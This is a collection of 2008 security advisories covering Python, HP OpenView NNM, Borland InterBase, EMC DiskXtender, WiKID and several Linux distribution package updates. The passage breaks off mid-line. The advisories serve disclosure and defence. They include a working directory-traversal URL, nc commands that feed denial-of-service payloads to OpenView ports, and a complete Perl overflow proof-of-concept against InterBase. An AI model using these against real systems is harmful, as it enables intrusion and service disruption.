IOActive Security Advisory: Incorrect input validation in PyString_FromStringAndSize() leads to multiple buffer overflows
Title: Incorrect input validation in PyString_FromStringAndSize()
leads to multiple buffer overflows
Date Discoverd: ??-April-2008
Date Reported: 08-April-2008
Date Patched: 09-April-2008
Date Disclosed: 11-April-2008
Criticality: High
Affected Products
-
Python 2.5.2, earlier and unstable version are likely to be vulnerable
Synopsis
The Python core API provides multiple functions for the allocation
of string objects, specifically providing an API call that allows
for either the allocation or reallocation of a PyStringObject.
This function, PyString_FromStringAndSize() takes two parameters:
a pointer and a signed integer. If the pointer is non-NULL then
the memory pointed to it is reallocated to the size specified
by the second parameter. If the pointer is NULL then the number
of bytes specified by the integer are allocated and returned.
During the course of its operations this second parameter is not
validated to contain a positive value. This in turn is summed
with the size of a PyStringObject and passed as a length to an
allocation function, potentially missallocating memory.
The result of this was multiple buffer overflows in various
components such as the previously disclosed zlib bug, the SSL
module, et cetera. Furthermore, a Python developer, Alexander
Belopolsky noted that the functions PyBytes_FromStringAndSize()
and PyUnicode_FromStringAndSize() contained the same
characteristics.
Techical Details
-
Python-2.5.2/Objects/stringobject.c:
52 PyObject *
53 PyString_FromStringAndSize(const char *str, Py_ssize_t size)
54 {
55 register PyStringObject *op;
56 assert(size >= 0);
57 if (size == 0 && (op = nullstring) != NULL) {
[...]
63 }
64 if (size == 1 && str != NULL &&
65 (op = characters[*str & UCHAR_MAX]) != NULL)
66 {
[...]
72 }
73
74 /* Inline PyObject_NewVar */
75 op = (PyStringObject *)PyObject_MALLOC(sizeof(PyStringObject) +
size);
The type Py_ssize_t is defined to be one of a number of types dependant
on platform, however it regardless of platform it will be signed. There
is an assert() at line 56 that attempts to verify the sanity of the
second parameter however in non-debug builds the assert() is omitted.
Then at line 75 the size parameter and the size of a string object
are summed together and passed as a parameter to PyObject_MALLOC().
Reproduction / Proof-of-Concept
---
When the length variable contains a value of -24 then the allocator is
told to reserve 0 bytes of memory, however the allocator modifies
the request and will allocate one byte of memory. For values ranging
between -2 and -23 a small amount of memory will be allocated due
to being summed with the size of a PyStringObject. Because of this
being an API call, exploitation beyond that is dependant on the
caller and current environment.
Remediation
---
This bug was patched in CVS, patching all three object types.
Further details can be found at http://bugs.python.org/issue2587
and http://svn.python.org/view?rev=62271&view=rev and
http://svn.python.org/view?rev=62272&view=rev
Trillian 3.1.9.0 DTD File Buffer Overflow
Name: Trillian 3.1.9.0 DTD File Buffer Overflow Software: Trillian 3.1.9.0 Vendor: Cerulean Studios Description: Trillian 3.1.9.0. Basic(and maybe minor versions and other as Pro) is vulnerable to parser xml format in .dtd file type. The explotation requires that the user download a malformed file and installed in a stixe directory and others. The bug is a function that parse .dtd files with SYSTEM and file identifier. Web: http://www.ceruleanstudios.com/ Download a poc file: http://www.p1mp4m.es/index.php?act=attach&type=post&id=18
Directory traversal and multiple Denials of Service in HP OpenView NNM 7.53
###
Luigi Auriemma
Application: HP OpenView Network Node Manager
http://www.openview.hp.com/products/nnm/
Versions: <= 7.53
Platforms:Windows (tested), Solaris, Linux, HP-UX
Bugs: A] CGIs directory traversal
B] Denial of Service in ovalarmsrv
C] NULL pointer in ovalarmsrv
D] process termination in ovtopmd
Exploitation: remote
Date: 11 Apr 2008
Author: Luigi Auriemma
e-mail: [EMAIL PROTECTED]
web:aluigi.org
###
1) Introduction
2) Bugs
3) The Code
4) Fix
###
===
1) Introduction
===
>From vendor's website:
OpenView NNM "automates the process of developing a hyper-accurate
topology of your physical network, virtual network services and the
complex relationships between them. It then uses that topology as the
basis for intelligent root cause analysis to enhance network
availability and performance."
###
===
2) Bugs
===
---
A] CGIs directory traversal
---
The CGIs available in NNM use some instructions which filters malicious
chars in the parameters passed by the clients, for example to avoid
directory traversal attacks, XSS and so on.
The path delimiter filtered by these CGIs is the backslash char, so
using the slash will allow an attacker to download the files from the
disk on which is installed NNM.
--
B] Denial of Service in ovalarmsrv
--
The ovalarmsrv service listening on port 2954 can be easily freezed
with CPU at 100% and without the possibility of handling further
requests on both its ports 2953 and 2954 simply sending an incomplete
multi line request.
In short the last numeric parameters of the requests 25, 45, 46, 47 and
81 is used to specify how much sub-arguments (one per line) will be
sent.
So ovalarmsrv starts a loop which terminates when all the sub arguments
are received; closing the connection or not sending all or part of
these arguments will freeze the entire service.
The following are all the supported requests and their "sscanf" format:
REQUEST_CONTRIB_EVENTS (22): "%d %d %s"
REQUEST_PRINT (25): "%d %d %d %d %s"
REQUEST_DETAILS (33): "%d %d %s"
REQUEST_EVENT_DELETE(35): "%d %d %s"
REQUEST_EVENT_ACK (36): "%d %d %s"
REQUEST_RUN_ACTION (37): "%d %d %s %s"
REQUEST_SPECDATA(41):
REQUEST_EVENT_UNACK (44): "%d %d %s"
REQUEST_SAVE(45): "%d %d %d %d %s"
REQUEST_CAT_CHANGE (46): "%d %d %d %[^\n]"
REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]"
REQUEST_CONF_ACTIONS(48): "%d %d\n"
REQUEST_RESTORE_STATE (62): "%d %[^\n]"
REQUEST_SAVE_DIR(63):
REQUEST_LOCALE (66): "%d"
REQUEST_FORMAT_PRINT(81): "%d %d %d %d %s"
REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]"
-
C] NULL pointer in ovalarmsrv
-
The parameter which specifies the amount of sub-arguments described
above is used to allocate a certain amount of initial dynamic memory
(value * 2) for storing all the sub-arguments which is then
reallocated wheen needed.
Specifying a too big unallocable amount of sub-arguments results in a
NULL pointer which will crash the service.
-
D] process termination in ovtopmd
-
The ovtopmd service listening on port 2532 uses a special type of
packet (0x36) for forcing the termination of the process ("Exiting due
to request of ovtopmd -k."), so an attacker can use this packet for
causing a Denial of Service.
###
===
3) The Code
===
A]
http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini
B,C,D]
http://aluigi.org/poc/closedviewx.zip
nc SERVER 2954 -v -v -w 2 < closedviewx1.txt
nc SERVER 2954 -v -v < closedviewx2.txt
nc SERVER 2532 -v -v < closedviewx3.txt
###
==
4) Fix
==
HP has been alerted and is working on a fix
###
---
Luigi Auriemma
http://aluigi.org
[ GLSA 200804-11 ] policyd-weight: Insecure temporary file creation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: policyd-weight: Insecure temporary file creation Date: April 11, 2008 Bugs: #214403 ID: 200804-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis policyd-weight uses temporary files in an insecure manner, allowing for a symlink attack. Background == policyd-weight is a Perl policy daemon for the Postfix MTA intended to eliminate forged envelope senders and HELOs. Affected packages = --- Package / Vulnerable / Unaffected --- 1 mail-filter/policyd-weight < 0.1.14.17 >= 0.1.14.17 Description === Chris Howells reported that policyd-weight creates and uses the "/tmp/.policyd-weight/" directory in an insecure manner. Impact == A local attacker could exploit this vulnerability to delete arbitrary files or change the ownership to the "polw" user via symlink attacks. Workaround == Set "$LOCKPATH = '/var/run/policyd-weight/'" manually in "/etc/policyd-weight.conf". Resolution == All policyd-weight users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-filter/policyd-weight-0.1.14.17" This version changes the default path for sockets to "/var/run/policyd-weight", which is only writable by a privileged user. Users need to restart policyd-weight immediately after the upgrade due to this change. References == [ 1 ] CVE-2008-1569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1569 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200804-12 ] gnome-screensaver: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: gnome-screensaver: Privilege escalation Date: April 11, 2008 Bugs: #213940 ID: 200804-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis gnome-screensaver allows local users to bypass authentication under certain configurations. Background == gnome-screensaver is a screensaver, designed to integrate with the Gnome desktop, that can replace xscreensaver. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 gnome-extra/gnome-screensaver < 2.20.0-r3 >= 2.20.0-r3 Description === gnome-screensaver incorrectly handles the results of the getpwuid() function in the file src/setuid.c when using directory servers (like NIS) during a network outage, a similar issue to GLSA 200705-14. Impact == A local user can crash gnome-xscreensaver by preventing network connectivity if the system uses a remote directory service for credentials such as NIS or LDAP, which will unlock the screen. Workaround == There is no known workaround at this time. Resolution == All gnome-screensaver users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=gnome-extra/gnome-screensaver-2.20.0-r3" References == [ 1 ] CVE-2008-0887 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0887 [ 2 ] GLSA 200705-14 http://www.gentoo.org/security/en/glsa/glsa-200705-14.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpXnfUBqAYeq.pgp Description: PGP signature
WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities
WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities Name Multiple Vulnerabilities in wClient-PHP Systems Affected wClient-PHP 3.0-2 and earlier versions Severity Medium Impact (CVSSv2) Medium (5/10, vector: AV:N/AC:L/Au:N/C:C/I:N/A:N) Vendorhttp://www.wikidsystems.com/ Advisory http://www.ush.it/team/ush/hack-wclient/wikid.txt AuthorFrancesco "ascii" Ongaro (ascii AT ush DOT it) Antonio "s4tan" Parata (s4tan AT ush DOT it) Date 20080411 I. BACKGROUND From the WiKID website: "The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens." II. DESCRIPTION In the wClient-PHP package PHP_SELF is echoed back to the client without proper sanitization leading to XSS issues. WiKID mantainers have released a new version of the software (3.0-3) that fixes exposed vulnerabilities and can be downloaded from the url: http://www.wikidsystems.com/downloads/network-clients Users that based their implementations on the code contained in sample.php are advised to upgrade. III. ANALYSIS During a review of the wClient-PHP-3.0-1.tar.gz package (an additional component of WiKID with network client functions) the following vulnerabilities were identified in the sample code: file sample.php, line 251: PHP_SELF insecure usage leads to XSS file sample.php, line 269: PHP_SELF insecure usage leads to XSS file sample.php, line 279: PHP_SELF insecure usage leads to XSS file sample.php, line 292: possible PHP_SELF insecure usage leads to XSS This one was not verified since it's not enabled in the version I have downloaded but probably it's exploitable in the exact same way as the other ones. file sample.php, line 306: PHP_SELF insecure usage leads to XSS $PHP_SELF can be exploited by requesting an URL like file.php/. Note: On recent PHP versions $PHP_SELF should be $_SERVER['PHP_SELF']. In case of register_globals=On on recent versions where the variable is undefined it's possible to override it by issuing PHP_SELF with the wished value in GPC (GET, POST, COOKIE). On old version of PHP it's possible to drive the value of PHP_SELF by GLOBALS poisoning [1]. Version 3.0-2 fix $PHP_SELF instances to $_SERVER['PHP_SELF'], users are strongly advised to do not use this version as it doesn't correctly fix presented vulnerabilities and is more exploitable than 3.0-1. An attacker can steal UserID, Passcode, Domain code and Registration code before they are sent back to the server itself and potentially poison the navigation of the user and steal other sensitive informations via social engineering (injecting additional fields in the form or showing "additional functions" to the user) abusing user's trust. Remediation consists in proper escaping the user controlled inputs. [1] http://www.ush.it/2006/01/25/php5-globals-vulnerability/ VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20080320 Bug discovered 20080320 Vendor contacted 20080411 Advisory released IX. CREDIT Francesco "ascii" Ongaro and Antonio "s4tan" Parata are credited with the discovery of this vulnerability. Francesco "ascii" Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it Antonio "s4tan" Parata web site: http://www.ictsc.it/ mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it X. LEGAL NOTICES Copyright (c) 2008 Francesco "ascii" Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 04.09.08: EMC DiskXtender Authentication Bypass Vulnerability
iDefense Security Advisory 04.09.08 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 09, 2008 I. BACKGROUND EMC DiskXtender is a data backup and migration suite. It consists of several applications that are used to manage storing large quantities of files across multiple storage devices. The main components of the product suite are the File System Manager, the MediaStor and the License Server. These components all create RPC endpoints that can be accessed remotely. For more information see the vendor's website at the following URL. http://software.emc.com/products/product_family/diskxtender_family.htm II. DESCRIPTION Remote exploitation of an authentication bypass vulnerability in EMC Corp.'s DiskXtender could allow an attacker to execute arbitrary code. Each of the main components of the DiskXtender suite is vulnerable to an authentication bypass vulnerability. Specifically, the authentication code contains a hard-coded login and password. By connecting to the RPC interface, and logging on with these credentials, it is possible to bypass the normal authentication process. III. ANALYSIS Exploitation of this vulnerability results in an unauthenticated attacker gaining administrative access to the DiskXtender server. This allows an attacker to create and delete files on the backup server, and run other DiskXtender commands. This could potentially lead to the execution of arbitrary code with SYSTEM privileges. IV. DETECTION iDefense confirmed the existence of this vulnerability in DiskXtender version 6.20.060 for Windows. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE "EMC has issued updates to correct this issue. More details can be found in knowledgebase article emc184091 available from powerlink.emc.com. EMC customers can further contact EMC Software Technical Support at 1-877-534-2867." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0961 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/21/2008 Initial vendor notification 02/22/2008 Initial vendor response 04/09/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security (www.harmonysecurity.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 04.09.08: EMC DiskXtender MediaStor Format String Vulnerability
iDefense Security Advisory 04.09.08 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 09, 2008 I. BACKGROUND EMC DiskXtender is a data backup and migration suite. It consists of several applications that are used to manage storing large quantities of files across multiple storage devices. One of the components of DiskXtender is the MediaStor, which is used to provide support for a variety of media and device types. For more information see the vendor's website at the following URL. http://software.emc.com/products/product_family/diskxtender_family.htm II. DESCRIPTION Remote exploitation of a format string vulnerability in EMC Corp.'s DiskXtender could allow an attacker to execute arbitrary code with the privileges of the affected service. When handling requests on the RPC interface with UUID b157b800-aef5-11d3-ae49-00600834c15f, the service does not properly validate the content of a string in requests. Since this string is passed directly to a formatting function, a format string vulnerability occurs. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service, usually SYSTEM. In order to exploit this vulnerability, authentication is required. IV. DETECTION iDefense confirmed the existence of this vulnerability in DiskXtender version 6.20.060 for Windows. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE "EMC has issued updates to correct this issue. More details can be found in knowledgebase article emc184091 available from powerlink.emc.com. EMC customers can further contact EMC Software Technical Support at 1-877-534-2867." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0963 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/21/2008 Initial vendor notification 02/22/2008 Initial vendor response 04/09/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security (www.harmonysecurity.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[SECURITY] [DSA 1546-1] New gnumeric packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1546-1 [EMAIL PROTECTED] http://www.debian.org/security/ Devin Carraway April 10, 2008http://www.debian.org/security/faq - Package: gnumeric Vulnerability : integer overflow Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-0668 Thilo Pfennig and Morten Welinder discovered several integer overflow weaknesses in Gnumeric, a GNOME spreadsheet application. These vulnerabilities could result in the execution of arbitrary code through the opening of a maliciously crafted Excel spreadsheet. For the stable distribution (etch), these problems have been fixed in version 1.6.3-5+etch1. For the unstable (sid) distribution, these problems were fixed in version 1.8.1-1. We recommend that you upgrade your gnumeric packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1.dsc Size/MD5 checksum: 1332 bf302ccff8f47985439966110044db14 http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3.orig.tar.gz Size/MD5 checksum: 16479052 da792f23bf26a69788736088e69fc7c0 http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1.diff.gz Size/MD5 checksum: 358014 8daad80708cbf16cf362475437304e96 Architecture independent packages: http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-common_1.6.3-5.1+etch1_all.deb Size/MD5 checksum: 5272974 82f8f43a0c2a8a6d9803e7cdfa0326dd http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-doc_1.6.3-5.1+etch1_all.deb Size/MD5 checksum: 4171320 f42bd6770c540f759763a849d7dea505 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_alpha.deb Size/MD5 checksum: 158390 458b52bbf3d015c432da2b889d7c3eca http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_alpha.deb Size/MD5 checksum: 2351352 7b078d3fcf9a27b75012bec809759981 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_amd64.deb Size/MD5 checksum: 156908 8860c1fd0ff35c0a1eda83758fa69457 http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_amd64.deb Size/MD5 checksum: 2202134 1d74f4a0c7ede26d7911743793f1c548 arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_arm.deb Size/MD5 checksum: 151102 41063103b8246a7bcc39db1b54a6b065 http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_arm.deb Size/MD5 checksum: 2018806 a486eca4fd7b88eb39829eed0743c22d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_hppa.deb Size/MD5 checksum: 161850 fc036ed19c3b161c0d8b06b15e47c9d6 http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_hppa.deb Size/MD5 checksum: 2418880 0f41e79ac16f966b9bb481ea414a0662 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_i386.deb Size/MD5 checksum: 2097038 ce792c3212eb3b912abe060b6438e4fc http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_i386.deb Size/MD5 checksum: 152302 df7cdbb758709551116b0b7a1af8757b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_ia64.deb Size/MD5 checksum: 2977964 b410a9d5a465433dc6963c9fdf6e7954 http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_ia64.deb Size/MD5 checksum: 173702 c34442685a8732e55136152c4da8ac90 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_mips.deb Size/MD5 checksum: 150700 31f9785f14f2b54963ea6992e201ce6d http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_mips.deb
Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC
Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC
Affected Software:
Borland InterBase 2007 Service Pack 2.
ibserver.exe version 8.0.0.123
Severity:
High
Summary:
There exists a vulnerability in Borland InterBase 2007.
The attacker who successfully exploited this vulnerability can gain control
of vulnerable systems.
Details:
There exists a buffer overflow vulnerability in "ibserver.exe" which is
contained in Borland InterBase 2007 Service Pack 2.
The vulnerable opcode is 0x52. When sending some malformed data as below to
TCP port 3050,
| 4bytes Opcode | "\x00\x00\x00\x52\"
| 4bytes Unknow | "\xFF\xFF\xFF\xFF"
| 4bytes Length1 | "\x00\x00\x03\xE8"
| Data1 | "\x41"x1000
| 4bytes Length2 | "\x00\x00\x00\x10"
| Data2 | "\x42"x16
InterBase ibserver service will terminate and reboot. It results in the return
address be overwritten as following.
.text:0041460F mov ecx, [ebp+arg_4]
.text:00414612 xor edx, edx
.text:00414614 mov dx, [ecx]
.text:00414617 pushedx
.text:00414618 mov eax, [ebp+arg_4]
.text:0041461B mov ecx, [eax+4]
.text:0041461E pushecx // | Data1
| "\x41"x1000
.text:0041461F mov edx, [ebp+arg_0]
.text:00414622 pushedx
.text:00414623 mov eax, [ebp+arg_0]
.text:00414626 mov ecx, [eax+4]
.text:00414629 calldword ptr [ecx+8]//call
function 411136 (strcpy)
.text:00411136 pushebp
.text:00411137 mov ebp, esp
.text:00411139 pushecx
.text:0041113A pushesi
.text:0041113B pushedi
..
.text:00411157 mov ecx, [ebp+loop_count]
.text:0041115A mov eax, [ebp+recv_info_struct]
.text:0041115D mov esi, [eax+0Ch]
.text:00411160 mov edi, [ebp+arg_4]
.text:00411163 mov edx, ecx
.text:00411165 shr ecx, 2
.text:00411168 rep movsd
//copy data 1000 bytes 0x41,without boundary
check
//Buffer overflow take place
.text:0041116A mov ecx, edx
.text:0041116C and ecx, 3
.text:0041116F rep movsb
:stack
FrameEBP RetEIP Syms Symbol
013AF5EC 41414141 N ibserver!.text + 00026F68
How to Reproduce:
Run the POC as below:
poc.pl victimAddress
Discovered by:
Liu Zhen Hua
###
# POC.pl
#
###
#!/usr/bin/perl -w
#Author: Liu Zhen Hua
use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip\n";
}
if ($#ARGV < 0) {
usage();
exit();
}
my $victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$host,
PeerPort=>3050);
my $pad0 = "\x41"x1000; #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16;
my $exploit =
"\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x10".$pad5;
print $victim $exploit ;
print " + Malicious request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;
iDefense Security Advisory 04.09.08: EMC DiskXtender File System Manager Stack Buffer Overflow Vulnerability
iDefense Security Advisory 04.09.08 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 09, 2008 I. BACKGROUND EMC DiskXtender is a data backup and migration suite. It consists of several applications that are used to manage storing large quantities of files across multiple storage devices. One of the components of DiskXtender is the File System Manager, which is used to create and manage backups. For more information see the vendor's website at the following URL. http://software.emc.com/products/product_family/diskxtender_family.htm II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in EMC Corp.'s DiskXtender could allow an attacker to execute arbitrary code with the privileges of the affected service. The File System Manager is prone to a stack-based buffer overflow vulnerability. When handling requests on the RPC interface with UUID b157b800-aef5-11d3-ae49-00600834c15f, the service does not properly validate the length of a string in the request. By making a specially crafted request, a stack based buffer overflow occurs. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service, usually SYSTEM. In order to exploit this vulnerability, authentication is required. IV. DETECTION iDefense confirmed the existence of this vulnerability in DiskXtender version 6.20.060 for Windows. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE "EMC has issued updates to correct this issue. More details can be found in knowledgebase article emc184091 available from powerlink.emc.com. EMC customers can further contact EMC Software Technical Support at 1-877-534-2867." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0962 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/21/2008 Initial vendor notification 02/22/2008 Initial vendor response 04/09/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security (www.harmonysecurity.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[USN-600-1] rsync vulnerability
=== Ubuntu Security Notice USN-600-1 April 11, 2008 rsync vulnerability CVE-2008-1720 === A security issue affects the following Ubuntu releases: Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.04: rsync 2.6.9-3ubuntu1.2 Ubuntu 7.10: rsync 2.6.9-5ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Sebastian Krahmer discovered that rsync could overflow when handling ACLs. An attacker could construct a malicious set of files that when processed by rsync could lead to arbitrary code execution or a crash. Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2.diff.gz Size/MD5:39403 9633c4376d4aa5d8e4c3da99405ca0d6 http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2.dsc Size/MD5: 658 08549083557957c66e73e42aa683f1b5 http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9.orig.tar.gz Size/MD5: 811841 996d8d8831dbca17910094e56dcb5942 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_amd64.deb Size/MD5: 275936 633f49faf8c061d199fa1fa109e4d46a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_i386.deb Size/MD5: 262086 381d1741edd2151b09fdfcd11829246f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_powerpc.deb Size/MD5: 282406 e8704361305a8308274b253863876766 sparc architecture (Sun 